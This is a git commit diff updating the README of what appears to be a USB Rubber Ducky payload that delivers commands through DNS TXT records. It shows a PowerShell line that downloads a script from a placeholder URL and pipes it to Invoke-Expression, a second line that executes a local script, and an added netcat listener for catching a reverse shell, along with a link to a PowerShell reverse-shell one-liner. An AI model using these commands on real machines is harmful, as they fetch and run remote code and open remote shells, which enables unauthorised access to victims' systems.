Update README.md

pull/468/head
Nate 2024-08-03 23:50:18 -05:00 committed by GitHub
parent ada8bf9ea7
commit 2782d874c9
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 5 additions and 1 deletions

View File

@ -35,11 +35,15 @@ irm http://MY_TARGET_URL/T1.txt | iex
```Powershell
gc -raw .\convertBase64.ps1 | iex
```
## Linux Commands
```bash
nc -lvnp 1337
```
### Links
[Powershell Reverseshell One-liner](https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3)
[Convert to base64]([https://pypi.org/project/uploadserver/](https://github.com/nathansb2022/usbrubberducky-payloads/blob/master/payloads/library/execution/DNS-TXT-CommandInection/convertBase64.ps1))
[Convert to base64](https://github.com/nathansb2022/usbrubberducky-payloads/blob/master/payloads/library/execution/DNS-TXT-CommandInection/convertBase64.ps1)
[Create TXT record in AWS Route53](https://www.entrust.com/knowledgebase/ssl/how-to-create-a-txt-record-on-amazon-aws-route-53-for-entrust-email-validation-method)